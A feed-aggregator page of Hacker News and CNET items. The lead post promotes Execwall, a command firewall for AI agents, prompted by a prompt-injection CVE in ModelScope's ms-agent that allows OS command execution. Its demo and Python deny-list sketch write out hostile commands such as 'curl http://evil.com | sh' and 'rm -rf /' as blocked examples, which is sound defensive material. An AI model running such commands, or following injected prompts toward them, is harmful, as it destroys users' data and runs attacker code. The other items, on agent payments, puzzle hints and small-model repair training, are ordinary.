Feed aggregator

Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injection)

Hacker News - Fri, 03/13/2026 - 7:16pm

CVE-2026-2256 just dropped - a prompt injection in ModelScope's ms-agent allows arbitrary OS command execution. CVSS 6.5, no auth required.

This is exactly why I built Execwall: an execution firewall for AI agents.

The problem: AI agents that can execute code are one prompt injection away from rm -rf /.

The solution: a security layer embedded directly in the shell, sitting between the application and the kernel:

- Seccomp-BPF filtering - block dangerous syscalls before they execute

- Policy engine - regex allowlist/denylist for commands, embedded in the shell

- Namespace isolation - Python sandbox with separate mount/PID/network namespaces

- Rate limiting - prevent automated exploitation

Even if an attacker injects a malicious prompt, the command gets blocked at the execution firewall:

[execwall]$ curl http://evil.com | sh
[X] DENIED: Network command blocked by policy
[execwall]$ rm -rf /
[X] DENIED: Recursive deletion blocked

Written in Rust. Works with any LLM agent framework.

GitHub: https://github.com/sundarsub/execwall

CVE details: https://radar.offseq.com/threat/cve-2026-2256-cwe-94-improper-control-of-generatio-97245d82
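The allowlist/denylist idea can be sketched in a few lines. Execwall itself is written in Rust and enforces policy at the syscall layer as well; this is only an illustrative Python sketch of the regex policy-engine concept, and the rule patterns here are hypothetical, not Execwall's actual policy format.

```python
import re

# Hypothetical policy rules: deny patterns always win over allow patterns.
DENY_PATTERNS = [
    r"\brm\s+-rf\s+/",            # recursive deletion rooted at /
    r"\b(curl|wget)\b.*\|\s*sh",  # piping a download straight into a shell
]
ALLOW_PATTERNS = [
    r"^(ls|cat|grep|git)\b",      # read-only / dev tooling
]

def check_command(cmd: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a shell command string."""
    for pat in DENY_PATTERNS:
        if re.search(pat, cmd):
            return False, f"DENIED: matched deny rule {pat!r}"
    for pat in ALLOW_PATTERNS:
        if re.search(pat, cmd):
            return True, "ALLOWED"
    # Default-deny: anything not explicitly allowed is blocked.
    return False, "DENIED: no allow rule matched (default deny)"
```

Default-deny matters here: an injected prompt that invents a command the policy author never anticipated still gets blocked.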

Comments URL: https://news.ycombinator.com/item?id=47371292

Points: 1

# Comments: 0

Categories: Hacker News

Ask HN: Has anyone built an AI agent that spends real money?

Hacker News - Fri, 03/13/2026 - 7:16pm

I want to build an AI agent that shops autonomously – you give it a card once, and it handles browsing, selecting, and paying on its own.

I've been working on an MCP server that connects AI agents to payment providers (Stripe, PayPal, virtual cards), but I keep hitting walls:

- Card issuers won't respond to individual developers

- Stripe requires 3D Secure for off-session payments

- E-commerce sites block browser automation

- Amazon v. Perplexity (March 9) confirmed that browser automation on major platforms carries real legal risk

Meanwhile Visa announced "Intelligent Commerce" and Mastercard launched "Agent Pay" – the networks see this coming, but the developer tooling isn't there yet. Has anyone actually shipped something like this? Concrete links, working examples, or constructive feedback would be especially helpful.

- What payment rail did you use?

- Is this a viable product or a regulatory minefield?

- Would you trust an AI with a $500 prepaid card to buy something for you?

What I have so far: https://github.com/xodn348/clawpay

Comments URL: https://news.ycombinator.com/item?id=47371289

Points: 1

# Comments: 0

Categories: Hacker News

Stop repeating yourself to Claude Code

Hacker News - Fri, 03/13/2026 - 7:15pm

Article URL: https://www.gopeek.ai

Comments URL: https://news.ycombinator.com/item?id=47371284

Points: 4

# Comments: 1

Categories: Hacker News

Today's NYT Connections Hints, Answers and Help for March 14, #1007

CNET Feed - Fri, 03/13/2026 - 6:30pm
Here are some hints and the answers for the NYT Connections puzzle for March 14, No. 1007.
Categories: CNET

Today's Wordle Hints, Answer and Help for March 14, #1729

CNET Feed - Fri, 03/13/2026 - 6:30pm
Here are hints and the answer for today's Wordle for March 14, No. 1,729.
Categories: CNET

TinyForge: Letting a 0.8B coding model learn from failure feedback on a MacBook

Hacker News - Fri, 03/13/2026 - 6:29pm

I ran a small experiment with tiny language models and got results that surprised me.

Setup:

Model: Qwen 3.5 0.8B (4-bit)
Hardware: MacBook Air M4
RAM: ~6GB runtime
Task: HumanEval coding problems

Loop:

- Model writes a solution

- Code is executed against tests

- If it fails, the model sees the exact failure (input, expected output, actual output)

- It retries several times (small evolutionary search)

- Broken solutions are paired with repaired versions

- LoRA training on those repair pairs
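The loop above can be sketched as follows. All names here are hypothetical and the `generate` callable stands in for the local model; the actual TinyForge implementation is in the linked repo.

```python
import subprocess
import sys
import tempfile

def run_tests(solution: str, test_code: str) -> tuple[bool, str]:
    """Execute candidate solution + tests in a subprocess; return (passed, feedback)."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
        f.write(solution + "\n" + test_code)
        path = f.name
    proc = subprocess.run([sys.executable, path],
                          capture_output=True, text=True, timeout=10)
    return proc.returncode == 0, proc.stderr

def repair_loop(generate, task: str, test_code: str, max_tries: int = 4):
    """generate(prompt) -> code string (the model call).
    Returns (final_solution_or_None, repair_pairs), where repair_pairs are
    (broken, failure_feedback, fixed) triples usable as LoRA training data."""
    pairs = []
    solution = generate(task)
    for _ in range(max_tries):
        ok, feedback = run_tests(solution, test_code)
        if ok:
            return solution, pairs
        # Feed the exact failure back to the model and retry.
        fixed = generate(f"{task}\n# Previous attempt:\n{solution}\n"
                         f"# Failure:\n{feedback}\n# Fix it.")
        pairs.append((solution, feedback, fixed))
        solution = fixed
    return None, pairs
```

Note that the repair pairs fall out of the loop as a side effect: every failed attempt plus its eventual fix becomes a training example for free.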

Training data was extremely small.

- 13 repair pairs total

- ~3 minutes of LoRA training on the laptop

Results on HumanEval slices the model never saw:

- Single pass improved from 16/50 → 28/50

- Hardest subset improved from 0/8 → 3/8

What surprised me was where the improvement shows up.

If you just ask the model to generate code once after training, the improvement is modest.

But when you place the trained model back inside the repair loop (where it sees test failures and retries), performance improves significantly. It appears the model isn't memorizing answers. It is learning the pattern of how to use failure feedback to repair code.

Small models don't have the capacity to memorize many solutions, but they can apparently learn the structure of:

"Here is exactly what failed → here is how I fix it."

This might generalize to other domains where automatic verification exists:

- SQL queries

- math problems

- data transformations

- program synthesis

Everything runs locally. No cloud compute or APIs.

Peak memory during training was ~10GB. Runtime inference sits around ~6GB.

Code is here if anyone wants to try it or critique the approach: https://github.com/ranausmanai/tinyforge

Curious if others experimenting with small models have seen similar behavior when training on repair pairs instead of correct answers.

Comments URL: https://news.ycombinator.com/item?id=47370841

Points: 1

# Comments: 0

Categories: Hacker News
